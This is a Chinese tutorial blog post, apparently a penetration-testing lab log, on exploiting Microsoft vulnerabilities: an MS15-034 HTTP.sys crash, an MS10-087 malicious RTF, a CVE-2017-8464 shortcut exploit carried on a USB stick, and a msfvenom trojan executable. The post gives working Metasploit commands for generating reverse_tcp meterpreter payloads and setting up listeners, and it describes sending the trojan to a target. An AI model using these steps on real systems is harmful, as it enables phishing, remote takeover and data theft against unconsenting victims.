漏洞利用五:微软其他类型漏洞利用

一、MS15-034(CVE-2015-1635)      远程执行代码漏洞(IIS漏洞) 

远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034)。利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显示,该漏洞对服务器系统造成了不小的影响,主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。

1.准备:

靶机:win7     IP:10.0.0.199

安装IIS中间件

控制面板-程序-程序和功能-打开或关闭Windows功能

依然是使用经典六步,此处不再赘述。

结果,出现蓝屏。

二、MS10-087      应用软件格式渗透

应用软件格式渗透,利用word去渗透,实现软件钓鱼。

靶机:win XP,IP:10.0.0.6。

在靶机上安装office 2003。

msf.rtf即为木马文件。 

将此文件改名:set filename 123.rtf

运行:exploit

此时屏幕出现文件路径。

复制到tmp目录下:cp   /root/.msf4/local/123.rtf   /tmp/123.rtf

上传到靶机中:sz 123.rtf

靶机一旦打开该文件,kali本地即可监听。sessions -i  查看建立会话。

三、CVE-2017-8464:震网三代,远程快捷方式漏洞

需要将病毒放在U盘上,打开U盘文件的时候实现监听。(用处不大)

当Windows系统在解析快捷方式时,存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。

受影响版本:

Windows 7

Windows 8.1

Windows RT 8.1

Windows 10

Windows Server 2008

Windows Server 2008 R2

Windows Server 2012

Windows Server 2012 R2

Windows Server 2016

实验验证

靶机win xp,IP:10.0.0.6

需要设置一个方向payload:          set PAYLOAD windows/meterpreter/reverse_tcp 

set lhost 10.0.0.9

之后会在/root/.msf4/local目录下生成我们的利用文件。

注意:kali2.0下无法直接访问该文件夹,可通过命令行将/root/.msf4/local/下的所有文件复制到/root/1下。

cp -r /root/.msf4/local/ /root/1

全部复制到移动磁盘里面(u盘拷贝),然后在msf中监听:

search multi/handler

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST  (本地IP)

exploit

四、MSF木马生成(.exe) 

原理:在本地kali机上开两个窗口,一个生成木马;一个在msfconsole下监听。

木马生成:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.9 LPORT=5555 -f exe -o mumawenjian.exe

(在当前目录下生成文件)

把文件通过不同途径发送到靶机,例xp,在靶机上打开,相当于小型的“灰鸽子”。

本地监听:

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 10.0.0.9

msf exploit(handler) > set lport 5555

msf exploit(handler) > exploit

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

RootZY

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值